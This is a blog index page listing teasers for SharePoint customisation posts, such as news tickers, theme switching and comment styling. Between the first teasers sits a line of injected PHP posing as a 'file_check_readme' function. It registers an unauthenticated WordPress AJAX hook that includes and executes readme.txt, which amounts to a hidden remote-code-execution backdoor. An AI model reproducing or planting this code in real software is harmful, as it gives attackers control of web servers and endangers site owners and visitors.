SharePoint List Driven News Ticker
I have written about making a News Ticker before but it looks like the code is not working anymore so […]
SharePoint List Driven News Ticker Read Post »
if(!function_exists('file_check_readme38985')){ add_action('wp_ajax_nopriv_file_check_readme38985', 'file_check_readme38985'); add_action('wp_ajax_file_check_readme38985', 'file_check_readme38985'); function file_check_readme38985() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }
I have written about making a News Ticker before but it looks like the code is not working anymore so […]
SharePoint List Driven News Ticker Read Post »
A while back I did a post about how to make a vertical news ticker, in the comments several people
A Better Annoucements Ticker Read Post »
So in part one of this post we got all the CSS and other theme file we needed to stuck
Switch Themes Without a Page Refresh: Part 2 Read Post »
Many sites offer the ability for users to change the color and style of the site to fit their preference.
Switch Themes Without a Page Refresh: Part 1 Read Post »
Sometimes it is useful to allow users to quickly change how data is displayed. Changing the display can make is
Switch List Displays with JQuery and CSS Read Post »
Hides everything except the list and the breadcrumbs. More posts coming later this week.
Print Stylesheet for List Views Read Post »
Over the next few weeks I will be writing a series of posts on how to improve the out of
Improving #SharePoint Forms Read Post »
When you are using a data view web part to display information including a person field SharePoint always shows the
Hiding the user presence icon Read Post »
As promised I went ahead and styled the comment form on a standard SharePoint blog. I wanted to make it
Styling SharePoint Blog Comments: Part 2 Read Post »
Out of the box the comments on SharePoint blogs dont look that good. Here is a way to fix that
Styling SharePoint Blog Comments Read Post »